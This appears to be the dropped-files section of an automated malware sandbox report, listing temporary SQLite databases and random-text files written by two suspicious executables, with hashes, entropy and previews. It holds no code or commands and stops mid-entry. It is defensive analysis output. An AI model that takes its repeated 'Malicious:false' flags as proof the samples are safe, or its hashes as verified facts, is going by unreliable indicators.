                    SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                    SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                    SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                    Malicious:false
                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\Users\user\AppData\Local\Temp\tmp8A01.tmp

                    Download File
                    Process:C:\Users\user\AppData\Roaming\LjGABleGAy.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                    Category:dropped
                    Size (bytes):106496
                    Entropy (8bit):1.136413900497188
                    Encrypted:false
                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                    MD5:429F49156428FD53EB06FC82088FD324
                    SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                    SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                    SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                    Malicious:false
                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\Users\user\AppData\Local\Temp\tmp8A31.tmp

                    Download File
                    Process:C:\Users\user\AppData\Roaming\LjGABleGAy.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                    Category:dropped
                    Size (bytes):106496
                    Entropy (8bit):1.136413900497188
                    Encrypted:false
                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                    MD5:429F49156428FD53EB06FC82088FD324
                    SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                    SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                    SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                    Malicious:false
                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\Users\user\AppData\Local\Temp\tmp8A51.tmp

                    Download File
                    Process:C:\Users\user\AppData\Roaming\LjGABleGAy.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                    Category:dropped
                    Size (bytes):106496
                    Entropy (8bit):1.136413900497188
                    Encrypted:false
                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                    MD5:429F49156428FD53EB06FC82088FD324
                    SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                    SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                    SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                    Malicious:false
                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\Users\user\AppData\Local\Temp\tmp9018.tmp

                    Download File
                    Process:C:\Users\user\AppData\Roaming\LjGABleGAy.exe
                    File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                    Category:dropped
                    Size (bytes):1026
                    Entropy (8bit):4.704346314649071
                    Encrypted:false
                    SSDEEP:24:XPzUwxdkbbeZScSZIv3ZoJNWhjcfzkabZsHx:fzUwx4bK+W/+fzuR
                    MD5:8B66CD8FCBCEB253D75DB5CDE6291FA2
                    SHA1:6CE0386190B9753849299B268AA7B8D15F9F72E2
                    SHA-256:51AD0E037F53D8EEDFEBC58112BDFA30796A0A56FBD31B65384B41896489BDB4
                    SHA-512:7C46027769E82ACD4E3ACB038FB80E34792E81B0527AE318194FE22BD066699A86E9B3E55AC5A1BCAC005FE0E8B7FB70B041656DF78BF84983A97CEDAA8861DC
                    Malicious:false
                    Preview:BJZFPPWAPTZISGUNDSDXEATFCUXAGEFCTTZKBNFYFVKDZEMPHZAJNCAVKZWYYNTVOWAJJLGAAUTHJTXJTGQLSVTGXPQIMVSAZAKJXHFSFGEVOJUYTICTQZLJZDQYBUBYFSZSBIOBVSAJCHKIQYCAYMMOZZQCCHGYUFOUMXHXCPNMUMVVZRXZCGPDXYDBBMVMWVPHNHLTQKLDBALGGHIVJYUKXJWAFDLMMQQUEQFWPXRQQODUGQSALTDJTROBSIRXEJYUMIWWHBCANDJZNUJGIKFXUWXKPWKATRJSISRBLFZRNYVGGJJMECDAMBUVQBAZGLVITWWCNZFHKZSKXZCMBCAKDDJCKKLPSOZVUJSWOYBBVEUPDSCKJRFEYGLDGCUHDWDNXCLOHDPVAIFYDTEOJCHJMFFBYBQICVVKCFBQZTCRCDMDLPWOJNYPCOZSCAPIZTHRAONKKSINEYBBWDVGRURGHBALLNKTXIGFWNKLQZPCTSMBRQYVMGXEIBGKILOUERUQSZIKLJQNKDPZJVSDIANCPNMTCRACOINNDAMOQOPAIVLAVJQWKZFANIEXSROWVPTCRRWMWEOIFZXRTNMYBGRZIKPJCTJYJQFKGVOKPTJYXUDCYYOIPMURGGXZGVLUDYKKODERMFIEIWKVSJARDMDMBGKRQHSUCNHMIFNOOKAZIJQSDSIGSBRMCBLXMKFSZZUAJROFXWXYRGSBMDTXFEMBZEMCYBLNRDJBWBOCUMLSOLNUPTETGCYWROACYQSFXBWNHGWPJVQNWAWKUVISCLHXAODXHGTGYBIVDGQQULRMEJMCYHRYXYWXLQTNEIINUCYEPKOEPHTQOQWVAZSBUDRHGYAFVQYNMYCERIVKOVOQNJLBIXTRBDBHNTZPWPYCVFUNIEAVJGCCWWHQQNTFCFYJDTKIZERPJVHSNNBWBOTMBMGRTKDWRLWPSEQAWSWDOFSPSEHOQRGFTQGBAGLJEZFNAHFMRNONCLEXLHXV

                    C:\Users\user\AppData\Local\Temp\tmp9028.tmp

                    Download File
                    Process:C:\Users\user\AppData\Roaming\LjGABleGAy.exe
                    File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                    Category:dropped
                    Size (bytes):1026
                    Entropy (8bit):4.701195573484743
                    Encrypted:false
                    SSDEEP:24:CXuIDWqLgX6vdVaxL46BNaYMbtbF+qEBHi7z/dd0Vc/6cUmeDs:ODHgX6vd0l4gnMbtbF+qEMPdNiTmcs
                    MD5:2530C45A92F347020337052A8A7D7B00
                    SHA1:7EB2D17587824A2ED8BA10D7C7B05E2180120498
                    SHA-256:8BEAEA56B1D06BFFFE6142E95BC808FD28015E6A3FF32BC2FAC4C5A7552FC853
                    SHA-512:78F4D4E93139D099D59F17867A6BB87A7DB92E1637A520B522A32DF14D18A39602F1C255C64C4C406BA45138294D9467850FEEA90C199D3434D60AE1C7F6B4DA
                    Malicious:false
                    Preview:DUUDTUBZFWQODSNPWYYAIDZFECIUBQYLVGHZRZFDGGWVZPGQSHTPZANMRMNDUZLXCVYYIRRTMYEOTHOFJLCKQKOCQKNMRKZTHKIIPBKXIKLDAZFJGRVUHMDDXAMADOCGROYYDTNZZUEROBUVEGQEAZOMYVDGVHXUWCBVRBLFLWITRUFMXJJLQTZTWLOSFUMQDKRZDXVRLBYBKLXGLTGADROPECYTRYJQJWZDWJQHGRYFIQLJDBJUFPEPZLWGXGGDQGOLJCVZAPHJZOSIZQHISQFRJJGEZIJEFACYWHJRHAADQBMDQFJAGFBEZNQNGWDHSAAXOAEHIEHTAEPMOFJSOCRPTEUZGGSVYGVNUAYJPFNXFSYEEMDNDGDUBNXUOHVEJQBDRGSCASTDANAAFPQYQEHHTAOTYKYJJYXDZMUTBXBCIFNYSYWNMYAEEUEIGDANIBIJWTMCMGVDPOCAVEJZDTVMKOQPOOOKMLFWWMOASXZUZVHWZKPBVANJIBBDPCEKXDPEFNTXPTFJRBFUPHQCKMDMMXQPDZLJPURSOLPQREZLEFYXCGNKSFQRMLKDMGSNURCWGNTDQUIOYBPNJAYWOVTXRGROGVHNGIEDBYKUHNRBBDKYQXANPQWPKEOHDUBNRSQPALMLJEQFMXCQMEOAKBRREEJTYCHGUEGBGPJLGWRCLYLAKRESHJPMPCUHRFXHVUIQCQZYDTCNRGWVTYBMIILXIIIOGMHAQBLHFXCLTIKGXWDVRGSSRDNCYOVCLTUUEWRIDEOSWWZKTQLGLSIFPVAFJDGWVZYJUOVTMGGZMWUYOQYCLDNLMKWCJBKOXTWTPCMMIEYMISQTQCKMPNWJVAXPFISOGTRIMGKBHKEJOEDYIGOBOPVFADMXZUZQZVMUDYSPUHDXFZMAVPGIHURQNBZXXDWPSHUEZEFABRCKBUQLCPYBNGKJCWBTBSWMABCFIYQJOHFJJEPNNMRWWMNLOTWSMOXCILCCNICPDFTO

                    C:\Users\user\AppData\Local\Temp\tmp9376.tmp

                    Download File
                    Process:C:\Users\user\AppData\Roaming\LjGABleGAy.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                    Category:dropped
                    Size (bytes):196608
                    Entropy (8bit):1.121297215059106
                    Encrypted:false
                    SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                    MD5:D87270D0039ED3A5A72E7082EA71E305
                    SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                    SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                    SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                    Malicious:false
                    Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\Users\user\AppData\Local\Temp\tmp9387.tmp

                    Download File
                    Process:C:\Users\user\AppData\Roaming\LjGABleGAy.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                    Category:dropped
                    Size (bytes):196608
                    Entropy (8bit):1.121297215059106
                    Encrypted:false
                    SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                    MD5:D87270D0039ED3A5A72E7082EA71E305
                    SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                    SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                    SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                    Malicious:false
                    Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\Users\user\AppData\Local\Temp\tmp9398.tmp

                    Download File
                    Process:C:\Users\user\AppData\Roaming\LjGABleGAy.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                    Category:dropped
                    Size (bytes):196608
                    Entropy (8bit):1.121297215059106
                    Encrypted:false
                    SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                    MD5:D87270D0039ED3A5A72E7082EA71E305
                    SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                    SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                    SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                    Malicious:false
                    Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\Users\user\AppData\Local\Temp\tmp93A8.tmp

                    Download File
                    Process:C:\Users\user\AppData\Roaming\LjGABleGAy.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                    Category:dropped
                    Size (bytes):196608
                    Entropy (8bit):1.121297215059106
                    Encrypted:false
                    SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                    MD5:D87270D0039ED3A5A72E7082EA71E305
                    SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                    SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                    SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                    Malicious:false
                    Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\Users\user\AppData\Local\Temp\tmp93B9.tmp

                    Download File
                    Process:C:\Users\user\AppData\Roaming\LjGABleGAy.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                    Category:dropped
                    Size (bytes):196608
                    Entropy (8bit):1.121297215059106
                    Encrypted:false
                    SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                    MD5:D87270D0039ED3A5A72E7082EA71E305
                    SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                    SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                    SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                    Malicious:false
                    Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\Users\user\AppData\Local\Temp\tmp93C9.tmp

                    Download File
                    Process:C:\Users\user\AppData\Roaming\LjGABleGAy.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                    Category:dropped
                    Size (bytes):196608
                    Entropy (8bit):1.121297215059106
                    Encrypted:false
                    SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                    MD5:D87270D0039ED3A5A72E7082EA71E305
                    SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                    SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                    SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                    Malicious:false
                    Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\Users\user\AppData\Local\Temp\tmp93DA.tmp

                    Download File
                    Process:C:\Users\user\AppData\Roaming\LjGABleGAy.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                    Category:dropped
                    Size (bytes):196608
                    Entropy (8bit):1.121297215059106
                    Encrypted:false
                    SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                    MD5:D87270D0039ED3A5A72E7082EA71E305
                    SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                    SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                    SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                    Malicious:false
                    Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\Users\user\AppData\Local\Temp\tmp9B6A.tmp

                    Download File
                    Process:C:\Users\user\Desktop\RgIbrhxoEx.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                    Category:dropped
                    Size (bytes):106496
                    Entropy (8bit):1.136413900497188
                    Encrypted:false
                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                    MD5:429F49156428FD53EB06FC82088FD324
                    SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                    SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                    SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                    Malicious:false
                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\Users\user\AppData\Local\Temp\tmp9B8A.tmp

                    Download File
                    Process:C:\Users\user\Desktop\RgIbrhxoEx.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                    Category:dropped
                    Size (bytes):106496
                    Entropy (8bit):1.136413900497188
                    Encrypted:false
                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                    MD5:429F49156428FD53EB06FC82088FD324
                    SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                    SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                    SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                    Malicious:false
                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\Users\user\AppData\Local\Temp\tmp9B9B.tmp

                    Download File
                    Process:C:\Users\user\Desktop\RgIbrhxoEx.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                    Category:dropped
                    Size (bytes):106496
                    Entropy (8bit):1.136413900497188
                    Encrypted:false
                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                    MD5:429F49156428FD53EB06FC82088FD324
                    SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                    SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                    SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                    Malicious:false
                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\Users\user\AppData\Local\Temp\tmp9BAB.tmp

                    Download File
                    Process:C:\Users\user\Desktop\RgIbrhxoEx.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                    Category:dropped
                    Size (bytes):106496
                    Entropy (8bit):1.136413900497188
                    Encrypted:false
                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                    MD5:429F49156428FD53EB06FC82088FD324
                    SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                    SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                    SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                    Malicious:false
                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\Users\user\AppData\Local\Temp\tmp9BBC.tmp

                    Download File
                    Process:C:\Users\user\Desktop\RgIbrhxoEx.exe
                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                    Category:dropped
                    Size (bytes):106496
                    Entropy (8bit):1.136413900497188
                    Encrypted:false
                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                    MD5:429F49156428FD53EB06FC82088FD324
                    SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                    SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                    SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                    Malicious:false
                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\Users\user\AppData\Local\Temp\tmpA68E.tmp

                    Download File
                    Process:C:\Users\user\Desktop\RgIbrhxoEx.exe
                    File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                    Category:dropped
                    Size (bytes):1026
                    Entropy (8bit):4.704346314649071
                    Encrypted:false
                    SSDEEP:24:XPzUwxdkbbeZScSZIv3ZoJNWhjcfzkabZsHx:fzUwx4bK+W/+fzuR
                    MD5:8B66CD8FCBCEB253D75DB5CDE6291FA2
                    SHA1:6CE0386190B9753849299B268AA7B8D15F9F72E2
                    SHA-256:51AD0E037F53D8EEDFEBC58112BDFA30796A0A56FBD31B65384B41896489BDB4
                    SHA-512:7C46027769E82ACD4E3ACB038FB80E34792E81B0527AE318194FE22BD066699A86E9B3E55AC5A1BCAC005FE0E8B7FB70B041656DF78BF84983A97CEDAA8861DC
                    Malicious:false
                    Preview:BJZFPPWAPTZISGUNDSDXEATFCUXAGEFCTTZKBNFYFVKDZEMPHZAJNCAVKZWYYNTVOWAJJLGAAUTHJTXJTGQLSVTGXPQIMVSAZAKJXHFSFGEVOJUYTICTQZLJZDQYBUBYFSZSBIOBVSAJCHKIQYCAYMMOZZQCCHGYUFOUMXHXCPNMUMVVZRXZCGPDXYDBBMVMWVPHNHLTQKLDBALGGHIVJYUKXJWAFDLMMQQUEQFWPXRQQODUGQSALTDJTROBSIRXEJYUMIWWHBCANDJZNUJGIKFXUWXKPWKATRJSISRBLFZRNYVGGJJMECDAMBUVQBAZGLVITWWCNZFHKZSKXZCMBCAKDDJCKKLPSOZVUJSWOYBBVEUPDSCKJRFEYGLDGCUHDWDNXCLOHDPVAIFYDTEOJCHJMFFBYBQICVVKCFBQZTCRCDMDLPWOJNYPCOZSCAPIZTHRAONKKSINEYBBWDVGRURGHBALLNKTXIGFWNKLQZPCTSMBRQYVMGXEIBGKILOUERUQSZIKLJQNKDPZJVSDIANCPNMTCRACOINNDAMOQOPAIVLAVJQWKZFANIEXSROWVPTCRRWMWEOIFZXRTNMYBGRZIKPJCTJYJQFKGVOKPTJYXUDCYYOIPMURGGXZGVLUDYKKODERMFIEIWKVSJARDMDMBGKRQHSUCNHMIFNOOKAZIJQSDSIGSBRMCBLXMKFSZZUAJROFXWXYRGSBMDTXFEMBZEMCYBLNRDJBWBOCUMLSOLNUPTETGCYWROACYQSFXBWNHGWPJVQNWAWKUVISCLHXAODXHGTGYBIVDGQQULRMEJMCYHRYXYWXLQTNEIINUCYEPKOEPHTQOQWVAZSBUDRHGYAFVQYNMYCERIVKOVOQNJLBIXTRBDBHNTZPWPYCVFUNIEAVJGCCWWHQQNTFCFYJDTKIZERPJVHSNNBWBOTMBMGRTKDWRLWPSEQAWSWDOFSPSEHOQRGFTQGBAGLJEZFNAHFMRNONCLEXLHXV

                    C:\Users\user\AppData\Local\Temp\tmpA69E.tmp

                    Download File
                    Process:C:\Users\user\Desktop\RgIbrhxoEx.exe
                    File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                    Category:dropped
                    Size (bytes):1026
                    Entropy (8bit):4.701195573484743
                    Encrypted:false
                    SSDEEP:24:CXuIDWqLgX6vdVaxL46BNaYMbtbF+qEBHi7z/dd0Vc/6cUmeDs:ODHgX6vd0l4gnMbtbF+qEMPdNiTmcs
                    MD5:2530C45A92F347020337052A8A7D7B00
                    SHA1:7EB2D17587824A2ED8BA10D7C7B05E2180120498
                    SHA-256:8BEAEA56B1D06BFFFE6142E95BC808FD28015E6A3FF32BC2FAC4C5A7552FC853
                    SHA-512:78F4D4E93139D099D59F17867A6BB87A7DB92E1637A520B522A32DF14D18A39602F1C255C64C4C406BA45138294D9467850FEEA90C199D3434D60AE1C7F6B4DA
                    Malicious:false
                    Preview:DUUDTUBZFWQODSNPWYYAIDZFECIUBQYLVGHZRZFDGGWVZPGQSHTPZANMRMNDUZLXCVYYIRRTMYEOTHOFJLCKQKOCQKNMRKZTHKIIPBKXIKLDAZFJGRVUHMDDXAMADOCGROYYDTNZZUEROBUVEGQEAZOMYVDGVHXUWCBVRBLFLWITRUFMXJJLQTZTWLOSFUMQDKRZDXVRLBYBKLXGLTGADROPECYTRYJQJWZDWJQHGRYFIQLJDBJUFPEPZLWGXGGDQGOLJCVZAPHJZOSIZQHISQFRJJGEZIJEFACYWHJRHAADQBMDQFJAGFBEZNQNGWDHSAAXOAEHIEHTAEPMOFJSOCRPTEUZGGSVYGVNUAYJPFNXFSYEEMDNDGDUBNXUOHVEJQBDRGSCASTDANAAFPQYQEHHTAOTYKYJJYXDZMUTBXBCIFNYSYWNMYAEEUEIGDANIBIJWTMCMGVDPOCAVEJZDTVMKOQPOOOKMLFWWMOASXZUZVHWZKPBVANJIBBDPCEKXDPEFNTXPTFJRBFUPHQCKMDMMXQPDZLJPURSOLPQREZLEFYXCGNKSFQRMLKDMGSNURCWGNTDQUIOYBPNJAYWOVTXRGROGVHNGIEDBYKUHNRBBDKYQXANPQWPKEOHDUBNRSQPALMLJEQFMXCQMEOAKBRREEJTYCHGUEGBGPJLGWRCLYLAKRESHJPMPCUHRFXHVUIQCQZYDTCNRGWVTYBMIILXIIIOGMHAQBLHFXCLTIKGXWDVRGSSRDNCYOVCLTUUEWRIDEOSWWZKTQLGLSIFPVAFJDGWVZYJUOVTMGGZMWUYOQYCLDNLMKWCJBKOXTWTPCMMIEYMISQTQCKMPNWJVAXPFISOGTRIMGKBHKEJOEDYIGOBOPVFADMXZUZQZVMUDYSPUHDXFZMAVPGIHURQNBZXXDWPSHUEZEFABRCKBUQLCPYBNGKJCWBTBSWMABCFIYQJOHFJJEPNNMRWWMNLOTWSMOXCILCCNICPDFTO

                    C:\Users\user\AppData\Local\Temp\tmpA69F.tmp

                    Download File
                    Process:C:\Users\user\Desktop\RgIbrhxoEx.exe
                    File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                    Category:dropped
                    Size (bytes):1026
                    Entropy (8bit):4.696508269038202
                    Encrypted:false
                    SSDEEP:24:RSjVGe9uHEleifrd16Wa05tSl2jFQzpqPMXexMApqIjsp:2Ge9MQ/d16Wjtc2j64Phxjpq82
                    MD5:0E9E92228B27AD7E7B4449467A529B0C
                    SHA1:209F92CDFC879EE2B98DEF315CCE166AFEC00331
                    SHA-256:284937D0EBFEDD95B2347297D957320D8D5CA5FC48218296767069CABA6B14A6
                    SHA-512:CECA5F634268817B4A076414FFAB7D81F93EEC7E7D08B8691CCE0B2BCAF8FC694365455886E36983B4D8D758BC65BC1868BE8DB51AD41E082473726BB1FFD7B8
                    Malicious:false
